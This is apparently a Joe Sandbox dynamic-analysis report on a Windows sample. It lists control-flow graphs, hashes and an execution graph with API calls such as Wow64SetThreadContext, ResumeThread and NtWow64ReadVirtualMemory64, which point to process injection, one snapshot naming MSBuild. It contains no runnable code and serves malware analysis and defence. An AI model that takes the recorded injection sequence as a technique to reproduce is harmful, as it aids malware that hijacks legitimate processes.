                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: MemoryProcessRead
                              • String ID:
                              • API String ID: 1726664587-0
                              • Opcode ID: 4fd3ce9adbc6dbd911e4ff624ff5e22ad633bc5eabcb684fc08eb326eb66e329
                              • Instruction ID: dbbfaf80a2029091f11adcc66f659f97d91aa2f95b1764e51bcbbd8fdb2b470b
                              • Opcode Fuzzy Hash: 4fd3ce9adbc6dbd911e4ff624ff5e22ad633bc5eabcb684fc08eb326eb66e329
                              • Instruction Fuzzy Hash: 55513770D08A5C8FDB94DF98C885BE9BBF1FB69310F1081AAD44CE3252DB34A985CB41
                              Function 00007FF886E15DCE Relevance: 1.7, APIs: 1, Instructions: 190threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 121 7ff886e15dce-7ff886e15ddb 122 7ff886e15ddd-7ff886e15de5 121->122 123 7ff886e15de6-7ff886e15ea2 121->123 122->123 127 7ff886e15ec4-7ff886e15f26 Wow64SetThreadContext 123->127 128 7ff886e15ea4-7ff886e15ec1 123->128 130 7ff886e15f28 127->130 131 7ff886e15f2e-7ff886e15f84 127->131 128->127 130->131
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: ContextThreadWow64
                              • String ID:
                              • API String ID: 983334009-0
                              • Opcode ID: f46d55cdcf1f6b1bdfc50f202d2a30c417a0a0278597fb56e02008577a833340
                              • Instruction ID: 5e61efdde9f04e63297b85c5f10145d85ad09ef0182c3aae58a3b9818ac3d460
                              • Opcode Fuzzy Hash: f46d55cdcf1f6b1bdfc50f202d2a30c417a0a0278597fb56e02008577a833340
                              • Instruction Fuzzy Hash: 06516A70D0864D8FEB95DFA8C845BEDBBB1FB6A311F1482AAD048D7256CB749885CB40
                              Function 00007FF886E15FAF Relevance: 1.6, APIs: 1, Instructions: 125threadCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 134 7ff886e15faf-7ff886e16070 ResumeThread 138 7ff886e16078-7ff886e160c2 134->138 139 7ff886e16072 134->139 139->138
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.1412146562.00007FF886E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886E10000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff886e10000_Mu7iyblZk8.jbxd
                              Similarity
                              • API ID: ResumeThread
                              • String ID:
                              • API String ID: 947044025-0
                              • Opcode ID: 9a24c10dbbaa58923c289d7ded27bbe3cb54679ee994f441ad4e52fed49f47cb
                              • Instruction ID: 06a0e492b65611d3c67f7f9a715e4876d3d803a4eef66801249f6555225409b3
                              • Opcode Fuzzy Hash: 9a24c10dbbaa58923c289d7ded27bbe3cb54679ee994f441ad4e52fed49f47cb
                              • Instruction Fuzzy Hash: EC410770D0860C8FDB98EF98D885AEDBBF0FB59310F10416AD409E7252DA75A985CF41

                              Execution Graph

                              Execution Coverage:16.8%
                              Dynamic/Decrypted Code Coverage:100%
                              Signature Coverage:17.2%
                              Total number of Nodes:598
                              Total number of Limit Nodes:55
                              execution_graph 48940 261d9a0 48941 261d9b7 48940->48941 48944 261cf58 48941->48944 48945 261cf72 48944->48945 48946 261cf77 KiUserExceptionDispatcher 48944->48946 48945->48946 48947 261cfb8 48946->48947 48948 261cfae 48946->48948 48951 261d720 48947->48951 48955 261d710 48947->48955 48952 261d744 48951->48952 48953 261d7b0 LdrInitializeThunk 48952->48953 48954 261d7de 48953->48954 48954->48954 48956 261d720 48955->48956 48957 261d7b0 LdrInitializeThunk 48956->48957 48958 261d7de 48957->48958 48962 261da30 48963 261da47 48962->48963 48964 261cf58 3 API calls 48963->48964 48965 261da69 48964->48965 48966 4e6fd30 48967 4e6fd95 LoadLibraryW 48966->48967 48968 4e6fd83 48966->48968 48969 4e6fdd3 48967->48969 48968->48967 48978 4e65500 48979 4e65524 48978->48979 48998 4e65539 48979->48998 49017 4e672a5 48979->49017 49021 4e67299 48979->49021 49025 4e65a98 48979->49025 49029 4e6729d 48979->49029 49033 4e67291 48979->49033 49037 4e6a610 48979->49037 49048 4e6b050 48979->49048 49053 4e67295 48979->49053 49057 5b84a8a 48979->49057 49061 4e67289 48979->49061 49065 4e672c9 48979->49065 49069 4e6c7c8 48979->49069 49073 4e6728d 48979->49073 49077 4e672cd 48979->49077 49081 4e67281 48979->49081 49085 4e672c1 48979->49085 49089 4e67300 48979->49089 49093 4e67285 48979->49093 49097 4e672c5 48979->49097 49101 5b84a98 48979->49101 49105 4e67279 48979->49105 49109 4e672b9 48979->49109 49113 4e6c7b8 48979->49113 49117 4e6727d 48979->49117 49121 4e672bd 48979->49121 49125 4e67271 48979->49125 49129 4e672b1 48979->49129 49133 4e672f0 48979->49133 49137 4e67275 48979->49137 49141 4e672b5 48979->49141 49145 4e672a9 48979->49145 49149 4e65aa8 48979->49149 49153 4e6726d 48979->49153 49157 4e672ad 48979->49157 49161 4e672a1 48979->49161 49165 4e6b060 48979->49165 49018 4e672d1 49017->49018 49170 4e67537 49018->49170 49022 4e672d1 49021->49022 49024 4e67537 2 API calls 49022->49024 49023 4e67397 49023->48998 49024->49023 49026 4e65aa8 49025->49026 49203 4e660e0 49026->49203 49030 4e672d1 49029->49030 49032 4e67537 2 API calls 49030->49032 49031 4e67397 49031->48998 49032->49031 49034 4e672d1 49033->49034 49036 4e67537 2 API calls 49034->49036 49035 4e67397 49035->48998 49036->49035 49038 4e6a631 49037->49038 49039 4e6a703 49037->49039 49040 4e6a647 49038->49040 49220 4e6b460 49038->49220 49231 4e6b470 49038->49231 49242 4e6adfe 49039->49242 49247 4e6aa60 49039->49247 49252 4e6ae00 49039->49252 49257 4e6ae2f 49039->49257 49040->48998 49041 4e6a7d8 49041->48998 49049 4e6b060 49048->49049 49051 4e6b460 9 API calls 49049->49051 49052 4e6b470 9 API calls 49049->49052 49050 4e6b0fe 49050->48998 49051->49050 49052->49050 49054 4e672d1 49053->49054 49056 4e67537 2 API calls 49054->49056 49055 4e67397 49055->48998 49056->49055 49058 5b84a98 49057->49058 49060 5b84b38 49058->49060 49282 5b86d08 49058->49282 49060->48998 49062 4e672d1 49061->49062 49064 4e67537 2 API calls 49062->49064 49063 4e67397 49063->48998 49064->49063 49066 4e672d1 49065->49066 49068 4e67537 2 API calls 49066->49068 49067 4e67397 49067->48998 49068->49067 49070 4e6c7ec LdrInitializeThunk 49069->49070 49072 4e6c86d 49070->49072 49072->48998 49074 4e672d1 49073->49074 49076 4e67537 2 API calls 49074->49076 49075 4e67397 49075->48998 49076->49075 49078 4e672d1 49077->49078 49080 4e67537 2 API calls 49078->49080 49079 4e67397 49079->48998 49080->49079 49082 4e672d1 49081->49082 49084 4e67537 2 API calls 49082->49084 49083 4e67397 49083->48998 49084->49083 49086 4e672d1 49085->49086 49088 4e67537 2 API calls 49086->49088 49087 4e67397 49087->48998 49088->49087 49090 4e6732a 49089->49090 49092 4e67537 2 API calls 49090->49092 49091 4e67397 49091->48998 49092->49091 49094 4e672d1 49093->49094 49096 4e67537 2 API calls 49094->49096 49095 4e67397 49095->48998 49096->49095 49098 4e672d1 49097->49098 49100 4e67537 2 API calls 49098->49100 49099 4e67397 49099->48998 49100->49099 49102 5b84abc 49101->49102 49103 5b86d08 2 API calls 49102->49103 49104 5b84b38 49102->49104 49103->49104 49104->48998 49106 4e672d1 49105->49106 49108 4e67537 2 API calls 49106->49108 49107 4e67397 49107->48998 49108->49107 49110 4e672d1 49109->49110 49112 4e67537 2 API calls 49110->49112 49111 4e67397 49111->48998 49112->49111 49114 4e6c7c8 LdrInitializeThunk 49113->49114 49116 4e6c86d 49114->49116 49116->48998 49118 4e672d1 49117->49118 49120 4e67537 2 API calls 49118->49120 49119 4e67397 49119->48998 49120->49119 49122 4e672d1 49121->49122 49124 4e67537 2 API calls 49122->49124 49123 4e67397 49123->48998 49124->49123 49126 4e672d1 49125->49126 49128 4e67537 2 API calls 49126->49128 49127 4e67397 49127->48998 49128->49127 49130 4e672d1 49129->49130 49132 4e67537 2 API calls 49130->49132 49131 4e67397 49131->48998 49132->49131 49134 4e672dc 49133->49134 49134->49133 49136 4e67537 2 API calls 49134->49136 49135 4e67397 49135->48998 49136->49135 49138 4e672d1 49137->49138 49140 4e67537 2 API calls 49138->49140 49139 4e67397 49139->48998 49140->49139 49142 4e672d1 49141->49142 49144 4e67537 2 API calls 49142->49144 49143 4e67397 49143->48998 49144->49143 49146 4e672d1 49145->49146 49148 4e67537 2 API calls 49146->49148 49147 4e67397 49147->48998 49148->49147 49150 4e65ad2 49149->49150 49152 4e660e0 4 API calls 49150->49152 49151 4e65b3f 49151->48998 49152->49151 49154 4e672d1 49153->49154 49156 4e67537 2 API calls 49154->49156 49155 4e67397 49155->48998 49156->49155 49158 4e672d1 49157->49158 49160 4e67537 2 API calls 49158->49160 49159 4e67397 49159->48998 49160->49159 49162 4e672d1 49161->49162 49164 4e67537 2 API calls 49162->49164 49163 4e67397 49163->48998 49164->49163 49166 4e6b08a 49165->49166 49168 4e6b460 9 API calls 49166->49168 49169 4e6b470 9 API calls 49166->49169 49167 4e6b0fe 49167->48998 49168->49167 49169->49167 49171 4e67562 49170->49171 49175 4e678c0 49171->49175 49180 4e678d0 49171->49180 49172 4e67397 49172->48998 49177 4e678d0 49175->49177 49176 4e67963 49176->49172 49177->49176 49185 4e67988 49177->49185 49190 4e67978 49177->49190 49181 4e678e4 49180->49181 49182 4e67963 49181->49182 49183 4e67988 2 API calls 49181->49183 49184 4e67978 2 API calls 49181->49184 49182->49172 49183->49181 49184->49181 49187 4e679b5 49185->49187 49186 4e67d37 49186->49177 49187->49186 49195 4e67f60 49187->49195 49199 4e67f50 49187->49199 49192 4e679b5 49190->49192 49191 4e67d37 49191->49177 49192->49191 49193 4e67f60 LdrInitializeThunk 49192->49193 49194 4e67f50 LdrInitializeThunk 49192->49194 49193->49192 49194->49192 49198 4e67f87 49195->49198 49196 4e680d7 49196->49187 49197 4e68029 LdrInitializeThunk 49197->49198 49198->49196 49198->49197 49202 4e67f60 49199->49202 49200 4e680d7 49200->49187 49201 4e68029 LdrInitializeThunk 49201->49202 49202->49200 49202->49201 49204 4e6611d 49203->49204 49208 4e66a40 49204->49208 49214 4e66a50 49204->49214 49205 4e65b3f 49205->48998 49209 4e66a50 LdrInitializeThunk 49208->49209 49211 4e66b59 49209->49211 49212 4e66c4e LdrInitializeThunk 49211->49212 49213 4e66c32 49211->49213 49212->49213 49213->49205 49215 4e66a72 LdrInitializeThunk 49214->49215 49217 4e66b59 49215->49217 49218 4e66c32 49217->49218 49219 4e66c4e LdrInitializeThunk 49217->49219 49218->49205 49219->49218 49222 4e6b470 49220->49222 49221 4e6b503 49223 4e6b544 49221->49223 49262 4e6c5ca 49221->49262 49266 4e6c5bf 49221->49266 49270 4e6c5c1 49221->49270 49274 4e6c3d0 49221->49274 49278 4e6c3c0 49221->49278 49222->49221 49224 4e6a610 9 API calls 49222->49224 49223->49040 49224->49222 49225 4e6bac1 49225->49040 49234 4e6b49e 49231->49234 49232 4e6b544 49232->49040 49233 4e6a610 9 API calls 49233->49234 49234->49233 49235 4e6b503 49234->49235 49235->49232 49237 4e6c3c0 LdrInitializeThunk 49235->49237 49238 4e6c3d0 LdrInitializeThunk 49235->49238 49239 4e6c5c1 LdrInitializeThunk 49235->49239 49240 4e6c5bf LdrInitializeThunk 49235->49240 49241 4e6c5ca LdrInitializeThunk 49235->49241 49236 4e6bac1 49236->49040 49237->49236 49238->49236 49239->49236 49240->49236 49241->49236 49243 4e6ab7a 49242->49243 49244 4e6ae2b 49243->49244 49245 4e6aba0 LdrInitializeThunk 49243->49245 49244->49041 49246 4e6abda 49245->49246 49248 4e6aa9a 49247->49248 49249 4e6aba0 LdrInitializeThunk 49248->49249 49250 4e6ae4b 49248->49250 49251 4e6abda 49249->49251 49250->49041 49253 4e6ab7a 49252->49253 49254 4e6ae2b 49253->49254 49255 4e6aba0 LdrInitializeThunk 49253->49255 49254->49041 49256 4e6abda 49255->49256 49258 4e6ab7a 49257->49258 49259 4e6aba0 LdrInitializeThunk 49258->49259 49260 4e6ae4b 49258->49260 49261 4e6abda 49259->49261 49260->49041 49263 4e6c476 49262->49263 49264 4e6c5e9 49263->49264 49265 4e6c49c LdrInitializeThunk 49263->49265 49264->49225 49265->49263 49269 4e6c476 49266->49269 49267 4e6c5e9 49267->49225 49268 4e6c49c LdrInitializeThunk 49268->49269 49269->49267 49269->49268 49271 4e6c476 49270->49271 49272 4e6c5e9 49271->49272 49273 4e6c49c LdrInitializeThunk 49271->49273 49272->49225 49273->49271 49277 4e6c3ec 49274->49277 49275 4e6c5e9 49275->49225 49276 4e6c49c LdrInitializeThunk 49276->49277 49277->49275 49277->49276 49281 4e6c3d0 49278->49281 49279 4e6c5e9 49279->49225 49280 4e6c49c LdrInitializeThunk 49280->49281 49281->49279 49281->49280 49286 5b86d40 49282->49286 49290 5b86d31 49282->49290 49283 5b86d2a 49283->49060 49287 5b86d52 49286->49287 49288 5b86d7e 49286->49288 49287->49288 49294 5b872b0 49287->49294 49288->49283 49291 5b86d40 49290->49291 49292 5b86d7e 49291->49292 49293 5b872b0 2 API calls 49291->49293 49292->49283 49293->49292 49295 5b872b5 49294->49295 49296 5b873d3 49295->49296 49299 261cb78 49295->49299 49303 261a568 49295->49303 49296->49288 49300 261cb80 DuplicateHandle 49299->49300 49302 261cc62 49300->49302 49302->49296 49304 261cb80 DuplicateHandle 49303->49304 49306 261cc62 49304->49306 49306->49296 48970 261d238 48971 261d25c 48970->48971 48972 261d2c8 LdrInitializeThunk 48971->48972 48973 261d2f6 48972->48973 48973->48973 49307 261cec8 49308 261cedf 49307->49308 49311 261cf58 3 API calls 49308->49311 49312 261cf48 49308->49312 49309 261cf02 49311->49309 49313 261cf58 KiUserExceptionDispatcher 49312->49313 49315 261cfb8 49313->49315 49316 261cfae 49313->49316 49317 261d720 LdrInitializeThunk 49315->49317 49318 261d710 LdrInitializeThunk 49315->49318 49316->49309 49317->49316 49318->49316 49319 26132c8 49320 26132ec 49319->49320 49326 2613301 49320->49326 49328 2613320 49320->49328 49338 4e63a39 49320->49338 49342 4e63a48 49320->49342 49346 2614868 49320->49346 49353 2614857 49320->49353 49360 2613330 49320->49360 49329 261335d 49328->49329 49370 2619662 49329->49370 49375 2619a4e 49329->49375 49380 2619a0f 49329->49380 49385 2619ab8 49329->49385 49390 26199d6 49329->49390 49395 2619997 49329->49395 49400 2619b22 49329->49400 49330 2613432 49330->49326 49339 4e63a48 49338->49339 49452 4e649f8 49339->49452 49340 4e63db9 49340->49326 49343 4e63a72 49342->49343 49345 4e649f8 4 API calls 49343->49345 49344 4e63db9 49344->49326 49345->49344 49347 2614895 49346->49347 49348 26148f4 49347->49348 49487 26193e1 49347->49487 49493 261941a 49347->49493 49499 261946b 49347->49499 49505 2618ff9 49347->49505 49354 2614868 49353->49354 49355 26148f4 49354->49355 49356 26193e1 4 API calls 49354->49356 49357 2618ff9 4 API calls 49354->49357 49358 261946b 4 API calls 49354->49358 49359 261941a 4 API calls 49354->49359 49356->49355 49357->49355 49358->49355 49359->49355 49361 261335d 49360->49361 49363 2619662 9 API calls 49361->49363 49364 2619b22 9 API calls 49361->49364 49365 2619997 9 API calls 49361->49365 49366 26199d6 9 API calls 49361->49366 49367 2619ab8 9 API calls 49361->49367 49368 2619a0f 9 API calls 49361->49368 49369 2619a4e 9 API calls 49361->49369 49362 2613432 49362->49326 49363->49362 49364->49362 49365->49362 49366->49362 49367->49362 49368->49362 49369->49362 49372 261969d 49370->49372 49371 2619fc7 49371->49371 49372->49371 49405 4e684a0 49372->49405 49410 4e68491 49372->49410 49377 26197f9 49375->49377 49376 2619fc7 49376->49376 49377->49376 49378 4e684a0 9 API calls 49377->49378 49379 4e68491 9 API calls 49377->49379 49378->49377 49379->49377 49381 26197f9 49380->49381 49382 2619fc7 49381->49382 49383 4e684a0 9 API calls 49381->49383 49384 4e68491 9 API calls 49381->49384 49383->49381 49384->49381 49386 26197f9 49385->49386 49387 2619fc7 49386->49387 49388 4e684a0 9 API calls 49386->49388 49389 4e68491 9 API calls 49386->49389 49387->49387 49388->49386 49389->49386 49392 26197f9 49390->49392 49391 2619fc7 49391->49391 49392->49391 49393 4e684a0 9 API calls 49392->49393 49394 4e68491 9 API calls 49392->49394 49393->49392 49394->49392 49397 26197f9 49395->49397 49396 2619fc7 49396->49396 49397->49396 49398 4e684a0 9 API calls 49397->49398 49399 4e68491 9 API calls 49397->49399 49398->49397 49399->49397 49401 26197f9 49400->49401 49402 2619fc7 49401->49402 49403 4e684a0 9 API calls 49401->49403 49404 4e68491 9 API calls 49401->49404 49402->49402 49403->49401 49404->49401 49406 4e684cd 49405->49406 49407 4e6850c 49406->49407 49415 4e69f68 49406->49415 49422 4e69f59 49406->49422 49407->49372 49411 4e684a0 49410->49411 49412 4e6850c 49411->49412 49413 4e69f68 9 API calls 49411->49413 49414 4e69f59 9 API calls 49411->49414 49412->49372 49413->49412 49414->49412 49416 4e69f70 49415->49416 49418 4e69f77 49415->49418 49416->49407 49417 4e69fb8 49417->49407 49418->49417 49428 4e6a468 49418->49428 49438 4e6a438 49418->49438 49419 4e6a040 49419->49407 49424 4e69f68 49422->49424 49423 4e69f70 49423->49407 49424->49423 49426 4e6a468 9 API calls 49424->49426 49427 4e6a438 9 API calls 49424->49427 49425 4e6a040 49425->49407 49426->49425 49427->49425 49429 4e6a47a 49428->49429 49432 4e6a4b0 49428->49432 49430 4e6a482 49429->49430 49429->49432 49435 4e6a468 9 API calls 49430->49435 49436 4e6a438 9 API calls 49430->49436 49448 4e6a518 49430->49448 49431 4e6a48e 49431->49419 49434 4e6a610 9 API calls 49432->49434 49433 4e6a578 49433->49419 49434->49433 49435->49431 49436->49431 49439 4e6a43d 49438->49439 49440 4e6a482 49439->49440 49442 4e6a4b0 49439->49442 49445 4e6a468 9 API calls 49440->49445 49446 4e6a438 9 API calls 49440->49446 49447 4e6a518 9 API calls 49440->49447 49441 4e6a48e 49441->49419 49444 4e6a610 9 API calls 49442->49444 49443 4e6a578 49443->49419 49444->49443 49445->49441 49446->49441 49447->49441 49449 4e6a544 49448->49449 49451 4e6a610 9 API calls 49449->49451 49450 4e6a578 49450->49431 49451->49450 49453 4e64a1f 49452->49453 49457 4e64a58 49453->49457 49464 4e64a48 49453->49464 49454 4e64a30 49454->49340 49458 4e64a74 49457->49458 49471 4e64c20 49458->49471 49475 4e64e0f 49458->49475 49479 4e64e11 49458->49479 49483 4e64c10 49458->49483 49459 4e64ad6 49459->49454 49465 4e64a74 49464->49465 49467 4e64c20 LdrInitializeThunk 49465->49467 49468 4e64c10 LdrInitializeThunk 49465->49468 49469 4e64e11 LdrInitializeThunk 49465->49469 49470 4e64e0f LdrInitializeThunk 49465->49470 49466 4e64ad6 49466->49454 49467->49466 49468->49466 49469->49466 49470->49466 49474 4e64c3c 49471->49474 49472 4e64d0c LdrInitializeThunk 49472->49474 49473 4e64e39 49473->49459 49474->49472 49474->49473 49478 4e64ce6 49475->49478 49476 4e64d0c LdrInitializeThunk 49476->49478 49477 4e64e39 49477->49459 49478->49476 49478->49477 49482 4e64ce6 49479->49482 49480 4e64d0c LdrInitializeThunk 49480->49482 49481 4e64e39 49481->49459 49482->49480 49482->49481 49486 4e64c20 49483->49486 49484 4e64d0c LdrInitializeThunk 49484->49486 49485 4e64e39 49485->49459 49486->49484 49486->49485 49489 2619187 49487->49489 49488 26195db 49488->49488 49489->49488 49511 261a1e1 49489->49511 49517 261a23c 49489->49517 49524 261a1f0 49489->49524 49495 2619187 49493->49495 49494 26195db 49494->49494 49495->49494 49496 261a1e1 4 API calls 49495->49496 49497 261a1f0 4 API calls 49495->49497 49498 261a23c 4 API calls 49495->49498 49496->49495 49497->49495 49498->49495 49501 2619187 49499->49501 49500 26195db 49500->49500 49501->49500 49502 261a1e1 4 API calls 49501->49502 49503 261a1f0 4 API calls 49501->49503 49504 261a23c 4 API calls 49501->49504 49502->49501 49503->49501 49504->49501 49507 2619035 49505->49507 49506 26195db 49506->49506 49507->49506 49508 261a1e1 4 API calls 49507->49508 49509 261a1f0 4 API calls 49507->49509 49510 261a23c 4 API calls 49507->49510 49508->49507 49509->49507 49510->49507 49512 261a1f0 49511->49512 49530 261a930 49512->49530 49540 261a9fc 49512->49540 49547 261a922 49512->49547 49513 261a233 49513->49489 49518 261a1fa 49517->49518 49519 261a24a 49517->49519 49521 261a930 4 API calls 49518->49521 49522 261a922 4 API calls 49518->49522 49523 261a9fc 2 API calls 49518->49523 49520 261a233 49520->49489 49521->49520 49522->49520 49523->49520 49525 261a205 49524->49525 49527 261a930 4 API calls 49525->49527 49528 261a922 4 API calls 49525->49528 49529 261a9fc 2 API calls 49525->49529 49526 261a233 49526->49489 49527->49526 49528->49526 49529->49526 49531 261a964 49530->49531 49533 261a9e7 49531->49533 49558 261ba48 49531->49558 49572 261ba3a 49531->49572 49532 261a568 DuplicateHandle 49534 261aa7b 49532->49534 49533->49532 49535 261ac99 49534->49535 49586 4e609a0 49534->49586 49594 4e60991 49534->49594 49535->49513 49541 261aa10 49540->49541 49542 261a568 DuplicateHandle 49541->49542 49543 261aa7b 49542->49543 49544 261ac99 49543->49544 49545 4e609a0 2 API calls 49543->49545 49546 4e60991 2 API calls 49543->49546 49544->49513 49545->49544 49546->49544 49548 261a8f9 49547->49548 49549 261a92a 49547->49549 49548->49513 49551 261a9e7 49549->49551 49554 261ba48 3 API calls 49549->49554 49555 261ba3a 3 API calls 49549->49555 49550 261a568 DuplicateHandle 49552 261aa7b 49550->49552 49551->49550 49553 261ac99 49552->49553 49556 4e609a0 2 API calls 49552->49556 49557 4e60991 2 API calls 49552->49557 49553->49513 49554->49551 49555->49551 49556->49553 49557->49553 49559 261ba6c 49558->49559 49602 261be70 49559->49602 49614 261be80 49559->49614 49560 261bb04 49626 261dbd0 49560->49626 49640 261dbe0 49560->49640 49561 261bb72 49570 261dbe0 2 API calls 49561->49570 49571 261dbd0 2 API calls 49561->49571 49562 261bbe0 49568 261dbe0 2 API calls 49562->49568 49569 261dbd0 2 API calls 49562->49569 49563 261bc4e 49563->49533 49568->49563 49569->49563 49570->49562 49571->49562 49573 261ba46 49572->49573 49584 261be70 3 API calls 49573->49584 49585 261be80 3 API calls 49573->49585 49574 261bb04 49578 261dbe0 2 API calls 49574->49578 49579 261dbd0 2 API calls 49574->49579 49575 261bb72 49582 261dbe0 2 API calls 49575->49582 49583 261dbd0 2 API calls 49575->49583 49576 261bbe0 49580 261dbe0 2 API calls 49576->49580 49581 261dbd0 2 API calls 49576->49581 49577 261bc4e 49577->49533 49578->49575 49579->49575 49580->49577 49581->49577 49582->49576 49583->49576 49584->49574 49585->49574 49588 4e609d4 49586->49588 49587 4e60d11 49587->49535 49588->49587 49589 4e6105b 49588->49589 49591 5b872b0 2 API calls 49588->49591 49662 5b87428 49588->49662 49589->49587 49592 5b87428 2 API calls 49589->49592 49593 5b872b0 2 API calls 49589->49593 49591->49588 49592->49589 49593->49589 49596 4e609a0 49594->49596 49595 4e60d11 49595->49535 49596->49595 49597 4e6105b 49596->49597 49598 5b87428 2 API calls 49596->49598 49599 5b872b0 2 API calls 49596->49599 49597->49595 49600 5b87428 2 API calls 49597->49600 49601 5b872b0 2 API calls 49597->49601 49598->49596 49599->49596 49600->49597 49601->49597 49603 261be80 49602->49603 49604 261a568 DuplicateHandle 49603->49604 49605 261bf5d 49604->49605 49611 261bf7f 49605->49611 49654 261b72c 49605->49654 49610 261b738 NtWow64ReadVirtualMemory64 49613 261c45d 49610->49613 49611->49560 49612 261b738 NtWow64ReadVirtualMemory64 49612->49613 49613->49611 49613->49612 49615 261beb3 49614->49615 49616 261a568 DuplicateHandle 49615->49616 49617 261bf5d 49616->49617 49618 261b72c NtWow64QueryInformationProcess64 49617->49618 49621 261bf7f 49617->49621 49619 261c03f 49618->49619 49620 261b738 NtWow64ReadVirtualMemory64 49619->49620 49619->49621 49622 261c1d6 49620->49622 49621->49560 49622->49621 49623 261b738 NtWow64ReadVirtualMemory64 49622->49623 49624 261c45d 49623->49624 49624->49621 49625 261b738 NtWow64ReadVirtualMemory64 49624->49625 49625->49624 49627 261dc13 49626->49627 49628 261a568 DuplicateHandle 49627->49628 49629 261dd11 49628->49629 49630 261b738 NtWow64ReadVirtualMemory64 49629->49630 49638 261dd33 49629->49638 49631 261de86 49630->49631 49632 261b738 NtWow64ReadVirtualMemory64 49631->49632 49631->49638 49633 261e11a 49632->49633 49634 261b738 NtWow64ReadVirtualMemory64 49633->49634 49636 261e38f 49633->49636 49633->49638 49634->49636 49635 261b738 NtWow64ReadVirtualMemory64 49635->49636 49636->49635 49636->49638 49639 261e9f8 49636->49639 49637 261b738 NtWow64ReadVirtualMemory64 49637->49639 49638->49561 49639->49637 49639->49638 49641 261dc13 49640->49641 49642 261a568 DuplicateHandle 49641->49642 49643 261dd11 49642->49643 49644 261b738 NtWow64ReadVirtualMemory64 49643->49644 49652 261dd33 49643->49652 49645 261de86 49644->49645 49646 261b738 NtWow64ReadVirtualMemory64 49645->49646 49645->49652 49647 261e11a 49646->49647 49648 261b738 NtWow64ReadVirtualMemory64 49647->49648 49650 261e38f 49647->49650 49647->49652 49648->49650 49649 261b738 NtWow64ReadVirtualMemory64 49649->49650 49650->49649 49650->49652 49653 261e9f8 49650->49653 49651 261b738 NtWow64ReadVirtualMemory64 49651->49653 49652->49561 49653->49651 49653->49652 49655 261cda0 NtWow64QueryInformationProcess64 49654->49655 49657 261c03f 49655->49657 49657->49611 49658 261b738 49657->49658 49659 261d0b0 NtWow64ReadVirtualMemory64 49658->49659 49661 261c1d6 49659->49661 49661->49610 49661->49611 49663 5b87453 49662->49663 49664 5b8753b 49663->49664 49665 261cb78 DuplicateHandle 49663->49665 49666 261a568 DuplicateHandle 49663->49666 49664->49588 49665->49664 49666->49664 48959 4e603e8 48960 4e60430 RtlCreateHeap 48959->48960 48961 4e604b1 48960->48961 49671 4e62098 49672 4e620b4 49671->49672 49673 4e62314 49672->49673 49674 4e62192 LdrInitializeThunk 49672->49674 49674->49672

                              Executed Functions

                              Function 04E684A0 Relevance: 4.4, Strings: 3, Instructions: 694COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 4e684a0-4e684cb 1 4e684d2-4e6850a 0->1 2 4e684cd 0->2 4 4e6850c-4e68515 1->4 5 4e6851a-4e68552 1->5 2->1 6 4e691c4-4e691d0 4->6 9 4e68554-4e6855d 5->9 10 4e68562-4e68572 5->10 9->6 128 4e68578 call 4e69ab8 10->128 129 4e68578 call 4e69aa9 10->129 12 4e6857e-4e68592 130 4e68594 call 4e69f68 12->130 131 4e68594 call 4e69f59 12->131 13 4e6859a-4e685ad 14 4e685b5-4e6863a 13->14 15 4e685af-4e685b0 13->15 53 4e68644-4e6864a 14->53 16 4e68655-4e6867b 15->16 18 4e68694-4e68768 16->18 19 4e6867d-4e6868f 16->19 20 4e6876e-4e687c9 18->20 19->20 26 4e687cb-4e687e3 20->26 27 4e687e8-4e688be 20->27 28 4e688c4-4e68911 26->28 27->28 35 4e68917-4e68936 28->35 36 4e68cbc-4e68cda 28->36 39 4e68955-4e68a5e 35->39 40 4e68938-4e68950 35->40 38 4e68ce0-4e68d0e 36->38 50 4e68d14-4e68d1c 38->50 51 4e691b9-4e691c2 38->51 43 4e68a64-4e68ab4 39->43 40->43 47 4e68ab6-4e68af2 43->47 48 4e68af7-4e68bc6 43->48 52 4e68c3b-4e68c8a 47->52 109 4e68bd2-4e68c35 48->109 56 4e68d24-4e68dac 50->56 57 4e68d1e-4e68d1f 50->57 51->6 71 4e68c8f-4e68cba 52->71 53->16 60 4e68db7-4e68def 56->60 57->60 64 4e68df1-4e68e09 60->64 65 4e68e0e-4e68f08 60->65 70 4e68f0e-4e68f52 64->70 65->70 75 4e68f54-4e68f84 70->75 76 4e68f89-4e6909b 70->76 71->38 80 4e690a1-4e6919c 75->80 76->80 126 4e691a4-4e691b7 80->126 109->52 126->6 128->12 129->12 130->13 131->13
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: #$S$T
                              • API String ID: 0-2617736706
                              • Opcode ID: 7819527c2f80576fb667a224a9a83830d100298de3699afe1fc41e3845285fd8
                              • Instruction ID: e3aa4a7551dd75424d15431383d0a5d9d9a5cb95378deb165bb3c40be3ebab8d
                              • Opcode Fuzzy Hash: 7819527c2f80576fb667a224a9a83830d100298de3699afe1fc41e3845285fd8
                              • Instruction Fuzzy Hash: 42826174E012298FDB65DF65C984BD9BBB2BB89300F1081EAD809A7355DB35AE81CF50
                              Function 04E66A50 Relevance: 3.2, APIs: 2, Instructions: 244libraryCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
